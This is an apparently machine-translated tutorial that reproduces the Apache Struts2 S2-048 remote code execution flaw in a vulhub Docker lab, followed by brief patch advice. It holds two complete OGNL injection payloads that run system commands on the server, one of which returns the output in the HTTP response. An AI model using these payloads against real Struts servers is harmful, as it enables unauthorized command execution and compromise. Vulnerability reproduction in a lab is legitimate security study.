Home >Operation and Maintenance >Safety >How to reproduce the Apache Struts2--048 remote code execution vulnerability

How to reproduce the Apache Struts2--048 remote code execution vulnerability

WBOY
WBOYforward
2023-05-12 19:43:101615browse

0x0#0Introduction

The Struts2 framework is an open source web application architecture for developing Java EE web applications . It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design ideas of WebWork as the core, absorbs some advantages of the Struts framework, and provides a neater Web application framework implemented in the MVC design pattern.

0x01 Vulnerability Overview

The Apache Struts2 2.3.x series has the struts2-struts1-plugin plug-in enabled and the struts2-showcase directory exists. The cause of the vulnerability is when ActionMessage receives the client When controlling parameter data, improper processing after subsequent data splicing and transmission leads to arbitrary code execution

0x02 Impact scope

Struts2 is enabled in the Apache Struts 2.3.x series -struts1-plugin plug-in version.

0x03 environment construction

1. It is more complicated to build Apache Struts2 by yourself. This vulnerability environment is built using the docker environment in vulhub.

Download address: https://github.com/vulhub/vulhub

2. After downloading, unzip and enter the s2-048 directory, and start the vulnerability environment

cd cd vulhub -master/struts2/s2-048/ //Enter the directory

怎么进行Apache Struts2--048远程代码执行漏洞复现

##docker-compose up -d //Start the shooting range

怎么进行Apache Struts2--048远程代码执行漏洞复现

3. Use docker ps to check whether the startup is successful

怎么进行Apache Struts2--048远程代码执行漏洞复现

4. Enter http:your-ip:8080/hello.action in the browser and see the following page environment Construction completed

怎么进行Apache Struts2--048远程代码执行漏洞复现

0x04 vulnerability recurrence

1. Enter the following link in the browser to access the vulnerability page

http://192.168.3.160:8080/integration/saveGangster.action

怎么进行Apache Struts2--048远程代码执行漏洞复现

2. Enter ${1+1} in the first form "Gangster Name", Enter whatever you want below, click submit to view the executed OGNL expression

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现##2. Put ${1+1 at "Gangster Name" }Modify the payload statement executed by the following command

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[' com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@ getRuntime().exec('id').getInputStream())).(#q)}

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现3. You can also Use Burp to capture the packet and modify it into the statement of the payload executed by the command

Note: The payload needs to be URL encoded

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?( #_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id') .(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe', '/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream( true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io. IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

怎么进行Apache Struts2--048远程代码执行漏洞复现

4. It can be implemented using automated scripts or graphical tools, and is not demonstrated here.

Tools can be searched and downloaded on GitHub

0x05 repair suggestions

1. Upgrade It is recommended to upgrade to the latest version

2. According to business conditions, disable and close (delete) \struts-2.3.x\apps\struts2-showcase.war package

The above is the detailed content of How to reproduce the Apache Struts2--048 remote code execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:yisu.com. If there is any infringement, please contact admin@php.cn delete